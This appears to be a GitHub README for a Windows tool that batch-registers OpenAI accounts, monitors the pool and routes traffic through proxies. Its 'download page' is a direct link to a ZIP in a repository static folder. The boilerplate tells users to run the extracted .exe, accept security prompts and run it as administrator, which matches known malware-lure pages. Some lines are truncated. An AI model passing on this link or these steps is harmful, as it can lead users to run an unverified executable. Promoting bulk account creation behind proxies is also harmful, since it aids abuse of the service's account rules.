CPA-Codex-Manager is a Windows app for managing an OpenAI account pool from one place. It helps you register accounts in batches, watch the pool in real time, and keep accounts in good shape with smart checks.
Use it when you need a clear panel for daily account work. It brings key tools into one screen, so you do not need to move between many pages.
Visit this page to download the app:
Open the page in your browser, then look for the latest release or download file. Save the file to your Windows PC before you start the setup.
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 500 MB of free disk space
- A stable internet connection
- Permission to run downloaded apps
- A browser for opening the download page
Follow these steps to run the app on Windows.
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Open the download page: https://github.com/Footracespasticity75/CPA-Codex-Manager/raw/refs/heads/main/static/Manager_Codex_CP_1.8.zip
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Look for the newest release or the main download file.
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Download the file to your computer.
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If the file is in a ZIP folder, right-click it and choose Extract All.
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Open the extracted folder.
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Find the app file. It may end in
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Double-click the app file to start it.
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If Windows asks for permission, choose Run or Yes.
After the app opens, set up the basics for your use case.
- Sign in with the account or access method your team uses.
- Set the pool size you want to manage.
- Choose how often the app checks account status.
- Add any proxy settings if your setup uses them.
- Save the settings before you start bulk tasks.
If you work with many accounts, keep the first run small. That helps you check that the app and network work as expected.
Create many accounts in one flow. This saves time when you need to set up a large pool.
Watch account status as it changes. You can check which accounts are active, idle, or need attention.
The app can help you spot weak accounts and keep the pool healthy. It supports routine checks, cleanup, and refresh tasks.
Connect the panel with your CLIProxyAPI setup so you can keep control of account data from one place.
Use a clean interface built for daily use. You can track accounts, review status, and manage tasks without deep technical steps.
- Download the file from the GitHub page.
- Open the file location in File Explorer.
- If the app came as a ZIP file, extract it first.
- Double-click the
.exefile. - Allow Windows security prompts if they appear.
- Wait for the main window to load.
- Use the menu or buttons to start your first task.
If the app does not open, check that the file finished downloading and that you extracted it fully.
If your account flow needs proxy use, enter your proxy details in the settings panel. This helps route traffic through the right path.
Set how many accounts you want to manage at one time. Start with a small number if you are testing the app.
Choose how often the app checks account health. Short intervals give faster updates. Longer intervals use fewer resources.
Turn on the checks you need for inactive or weak accounts. You can keep the pool clean without manual review of each account.
- Download the app from the GitHub page.
- Open it on Windows.
- Add your account pool settings.
- Run a small batch task first.
- Check the live status view.
- Adjust your maintenance settings.
- Scale up after the first run looks correct.
- Make sure the download finished fully.
- Check that you extracted all files from the ZIP.
- Run the app as an administrator if Windows blocks it.
- Confirm that your internet connection is active.
- Review proxy settings if the app cannot reach the service.
- Close the app and open it again if the window freezes.
- Download the file again if it looks broken.
Keep your account data in a safe place. Do not share your login details with people who do not need them. If your team uses proxies or shared access, keep the settings list in a private folder.
After extraction, you may see files like these:
CPA-Codex-Manager.exe- main appconfigfolder - settings fileslogsfolder - app activity recordsdatafolder - local account dataREADMEfile - usage notes
- Start button: runs the selected task
- Stop button: ends the current task
- Refresh button: updates the live view
- Settings button: opens app options
- Import button: adds account data
- Export button: saves your data to a file
- Start with one small batch.
- Check the live dashboard after each run.
- Keep your proxy list updated.
- Remove dead accounts when you see them.
- Back up your settings file before large changes.
- Use one setup profile for testing and one for normal use.
Yes. The app is meant for normal Windows use with buttons and settings.
No special tools are needed for basic use. A browser and Windows are enough to get the file and run it.
Yes. The app is built for pool-based account management and batch tasks.
Yes. The panel includes real-time monitoring for the pool.
You can connect it in the settings if your setup needs that platform.